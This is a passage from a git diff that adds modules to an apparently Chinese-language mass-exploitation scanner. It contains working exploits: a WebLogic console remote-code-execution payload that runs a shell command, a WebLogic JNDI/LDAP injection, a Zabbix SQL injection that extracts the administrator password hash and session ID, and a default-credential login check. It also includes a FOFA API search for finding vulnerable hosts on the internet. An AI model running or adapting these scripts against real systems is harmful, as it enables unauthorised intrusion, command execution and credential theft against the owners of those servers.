+NAME='CVE_2020_16882' +AUTHOR = "Faith" +REMARK = 'Weblogic未授权远程代码执行漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url = target + '/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29' + headers = {"User-Agent":ua} + data = ''' + GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1 + cmd: ls + Host: 127.0.0.1:7001 + ''' + r = requests.post(vuln_url, headers=headers,data=data,verify=False,timeout=3) + try: + if r.status_code ==200: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/CVE_2021_2109.py b/Moudle/Weblogic/CVE_2021_2109.py new file mode 100644 index 0000000..e78b367 --- /dev/null +++ b/Moudle/Weblogic/CVE_2021_2109.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import requests +from requests.packages.urllib3.exceptions import InsecurePlatformWarning + + + +# 脚本信息 +###################################################### +NAME='CVE_2021_2109' +AUTHOR="Faith" +REMARK='Weblogic LDAP 远程代码执行漏洞' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result = {} + ldap_url = target + a = ldap_url.replace('http','ldap').replace('.',';',3).replace('7001','1389') + b = a.replace(';','.',2) + + headers = {"UserAgent":"ua"} + url = target + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle('{}/Basic/WeblogicEcho;AdminServer')".format(b) + try: + requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) + r = requests.get(url=url,headers=headers,verify=False,timeout=3) + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Weblogic/Weblogic_Console_Info_Leak.py b/Moudle/Weblogic/Weblogic_Console_Info_Leak.py new file mode 100644 index 0000000..16e9ae6 --- /dev/null +++ b/Moudle/Weblogic/Weblogic_Console_Info_Leak.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# 脚本信息 +###################################################### +NAME='Weblogic_Console_Info_Leak' +AUTHOR = "Faith" +REMARK = 'Weblogic控制台路径泄露' +FOFA_RULE='app="Oracle-BEA-WebLogic-Server"' +###################################################### + +def poc(target): + result={} + vuln_url = target + '/console/login/LoginForm.jsp' + headers = {"User-Agent":ua} + + r = requests.get(vuln_url, headers=headers,verify=False,timeout=3) + try: + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = vuln_url + return result + else: + pass + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Zabbix/CVE_2016_10134.py b/Moudle/Zabbix/CVE_2016_10134.py new file mode 100644 index 0000000..9a5a52d --- /dev/null +++ b/Moudle/Zabbix/CVE_2016_10134.py @@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import re +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE_2016_10134' +AUTHOR="Joker" +REMARK='Zabbix SQL注入' +FOFA_RULE='title="zabbix"' +###################################################### + +def poc(target): + result = {} + #'检查是否存在 SQL 注入' + payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1" + vuln_url1 = target + payload + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r1 = requests.get(url=vuln_url1, headers=headers, verify=False, timeout=5) + if 'You have an error in your SQL syntax' in r1.text: + result['target'] = target + result['poc'] = NAME + return result + else: + pass + except Exception as e: + pass + +def exp(target): + # '尝试进行用户密码注入' + result ={} + passwd = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + session = "(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + payload2 = target + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + passwd + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + payload3 = target + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + session + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1" + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36", + } + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r2 = requests.get(url=payload2, headers=headers, verify=False, timeout=5) + r3 = requests.get(url=payload3, headers=headers, verify=False, timeout=5) + result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1") + result2 = result_reg.findall(r2.text) + result3 = result_reg.findall(r3.text) + if result2: + print("[+]" + target ) + print("管理员 用户密码:" + result2[0]) + if result3: + print("Cookie SessionID:" + result3[0]) + else: + print("未成功利用") + + except Exception as e: + # print(e) + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1") diff --git a/Moudle/Zabbix/Zabbix_Console_default_password.py b/Moudle/Zabbix/Zabbix_Console_default_password.py new file mode 100644 index 0000000..45b29ee --- /dev/null +++ b/Moudle/Zabbix/Zabbix_Console_default_password.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import json +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='Zabbix_Console_default_password' +AUTHOR="RabbitMask" +REMARK='zabbix Console default password' +FOFA_RULE='app="ZABBIX-监控系统"' +###################################################### + +def poc(target): + result={} + headers={ + "User-Agent": ua, + 'Content-Type':'application/json', + } + + data = { + "jsonrpc": "2.0", + "method": "user.login", + "params": { + "user": "Admin", + "password": "zabbix" + }, + "id": 1 + } + + try: + r = requests.post(target+"/api_jsonrpc.php",headers=headers, data=json.dumps(data), verify=False,timeout=3) + if r.status_code==404: + rr = requests.post(target + "/zabbix/api_jsonrpc.php", headers=headers, data=json.dumps(data), verify=False, timeout=3) + if rr.status_code == 200 and 'result' in rr.text and 'error' not in rr.text: + result['target'] = target + result['poc'] = NAME + result['username'] = 'Admin' + result['password'] = 'zabbix' + return result + elif r.status_code ==200 and 'result' in r.text and 'error' not in r.text: + result['target'] = target + result['poc'] = NAME + result['username'] = 'Admin' + result['password']='zabbix' + return result + except: + pass + + + +if __name__ == '__main__': + poc("http://127.0.0.1/") \ No newline at end of file diff --git a/Output/README.md b/Output/README.md new file mode 100644 index 0000000..388c120 --- /dev/null +++ b/Output/README.md @@ -0,0 +1 @@ +### 结果导出目录 \ No newline at end of file diff --git a/Seek/fofaapi.py b/Seek/fofaapi.py new file mode 100644 index 0000000..a01a931 --- /dev/null +++ b/Seek/fofaapi.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import base64 +import requests + +from Config.config_decorators import Save_Csv +from Config.config_api import FOFA_EAMIL, FOFA_API_KEY + + +def fofaapi(keyword,num): + reslist=[] + bkeyword = bytes(keyword, encoding="utf8") + bs64 = base64.b64encode(bkeyword) + bs64 = bs64.decode() + res = requests.get('https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&fields=host,ip,port,country,city,server,title&size={}'.format(FOFA_EAMIL,FOFA_API_KEY,bs64,str(num))) + result = res.json()['results'] + # print(result) + for i in result: + dic={} + dic['host'] = i[0] + dic['ip'] = i[1] + dic['port'] = i[2] + dic['country'] = i[3] + dic['city'] = i[4] + dic['server'] = i[5] + dic['title'] = i[6] + reslist.append(dic) + print(dic) + return reslist + +@Save_Csv +def run(keyword,num): + return fofaapi(keyword,num) + + +if __name__ == '__main__': + fofaapi('app="test"',3) diff --git a/Tools/ReBuild.py b/Tools/ReBuild.py new file mode 100644 index 0000000..ae3917c --- /dev/null +++ b/Tools/ReBuild.py @@ -0,0 +1,117 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import os +from importlib import import_module +from collections import Counter + +######################################################################################################################## +#pro +def get_moudle(): + dir = 'Moudle' #pro + # dir = '../Moudle' #dev + list=os.listdir(dir) + moudles=[] + for i in list: + if i !='__pycache__': + path = os.path.join(dir, i) + if os.path.isdir(path): + moudles.append(i) + return moudles + +def get_payload(moudle): + dir = 'Moudle/'+moudle #pro + # dir = '../Moudle/'+moudle #dev + list = os.listdir(dir) + payloads = [] + for i in list: + tmp=[] + path = os.path.join(dir, i) + if os.path.isfile(path): + if '.py' in i: + payload=i.replace('.py','') + tmp.append(payload) + tmp.append(get_remark(moudle,payload)) + payloads.append(tmp) + return payloads + +def get_remark(moudle,payload): + return import_module('Moudle.'+moudle+'.'+payload).REMARK + + + + + +def Rebuild(): + str="" + moudles=get_moudle() + MOUDLE_NUM = len(moudles) + PAYLOAD_NUM = 0 + for i in moudles: + str=str+("# {}\n".format(i)) + for j in get_payload(i): + str=str+("from Moudle.{} import {}\n".format(i,j[0])) + PAYLOAD_NUM=PAYLOAD_NUM+1 + str=str+("\n") + NUM="MOUDLE_NUM={}\nPAYLOAD_NUM={}\n\n".format(MOUDLE_NUM,PAYLOAD_NUM) + f=open('Moudle/Moudle_index.py','w') + f.write(NUM+str) + f.close() + + +######################################################################################################################## +#dev +def get_moudle_dev(): + # dir = 'Moudle' #pro + dir = '../Moudle' #dev + list=os.listdir(dir) + moudles=[] + for i in list: + if i !='__pycache__': + path = os.path.join(dir, i) + if os.path.isdir(path): + moudles.append(i) + return moudles +def get_payload_dev(moudle): + # dir = 'Moudle/'+moudle #pro + dir = '../Moudle/'+moudle #dev + list = os.listdir(dir) + payloads = [] + for i in list: + tmp=[] + path = os.path.join(dir, i) + if os.path.isfile(path): + if '.py' in i: + payload=i.replace('.py','') + tmp.append(payload) + tmp.append(get_remark(moudle,payload)) + tmp.append(get_author(moudle, payload)) #dev + payloads.append(tmp) + return payloads + +def get_author(moudle,payload): + return import_module('Moudle.'+moudle+'.'+payload).AUTHOR + +def Rebuild_dev(): + moudles=get_moudle_dev() + res=[] + for i in moudles: + for j in get_payload_dev(i): + res.append(j[2]) + dic=Counter(res) + for key in dic: + value = dic[key] + print(key,value) + + +if __name__ == '__main__': + # get_moudle() + # Rebuild() + Rebuild_dev() \ No newline at end of file